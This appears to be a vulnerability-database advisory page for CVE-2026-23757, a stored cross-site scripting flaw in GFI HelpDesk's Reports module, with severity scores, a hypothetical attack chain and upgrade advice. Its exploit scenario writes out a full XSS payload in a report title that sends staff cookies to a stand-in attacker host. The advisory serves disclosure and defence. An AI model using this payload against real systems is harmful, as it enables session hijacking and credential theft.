Skip to main content

Helpdesk CVE-2026-23757

| EUVD-2026-23929 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-04-20 VulnCheck GHSA-27jw-fcpv-p46x
XSS Helpdesk
5.1
CVSS 4.0 · NVD
Share

Severity by source

NVD PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
P
Scope
X

Lifecycle Timeline

6
Analysis Generated
Apr 20, 2026 - 18:28 vuln.today
CVSS changed
Apr 20, 2026 - 18:22 NVD
5.4 (MEDIUM) 5.1 (MEDIUM)
EUVD ID Assigned
Apr 20, 2026 - 18:00 euvd
EUVD-2026-23929
Analysis Generated
Apr 20, 2026 - 18:00 vuln.today
Patch released
Apr 20, 2026 - 18:00 nvd
Patch available
CVE Published
Apr 20, 2026 - 17:27 nvd
MEDIUM 5.1

DescriptionCVE.org

GFI HelpDesk before 4.99.10 contains a stored cross-site scripting vulnerability in the Reports module where the title parameter is passed directly to SWIFT_Report::Create() without HTML sanitization. Attackers can inject arbitrary JavaScript into the report title field when creating or editing a report, and the payload executes when staff members view and click the affected report link in the Manage Reports interface.

AnalysisAI

Stored cross-site scripting in GFI HelpDesk before version 4.99.10 allows authenticated attackers to inject arbitrary JavaScript into report titles via the Reports module, with payload execution triggered when staff members access the report link in the Manage Reports interface. The vulnerability requires attacker authentication and user interaction (clicking the report link), limiting real-world impact to internal staff compromise scenarios rather than mass exploitation. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Obtain HelpDesk user credentials
Delivery
Navigate to Reports module
Exploit
Create/edit report with XSS payload in title
Install
Submit malicious report
C2
Victim staff member clicks report link
Execute
JavaScript executes in victim browser
Impact
Session/credentials compromised
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires the attacker to possess valid HelpDesk user credentials with permission to create or edit reports in the Reports module - the vulnerability does not affect unauthenticated access. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment This vulnerability presents moderate real-world risk constrained by multiple exploitation factors. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A HelpDesk operator with legitimate user credentials creates a report with the title 'Monthly Sales Report<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)" />'. When the report is saved, the payload is stored in the database. …
Remediation Upgrade GFI HelpDesk to version 4.99.10 or later, which includes HTML sanitization for the report title parameter. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-23757 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy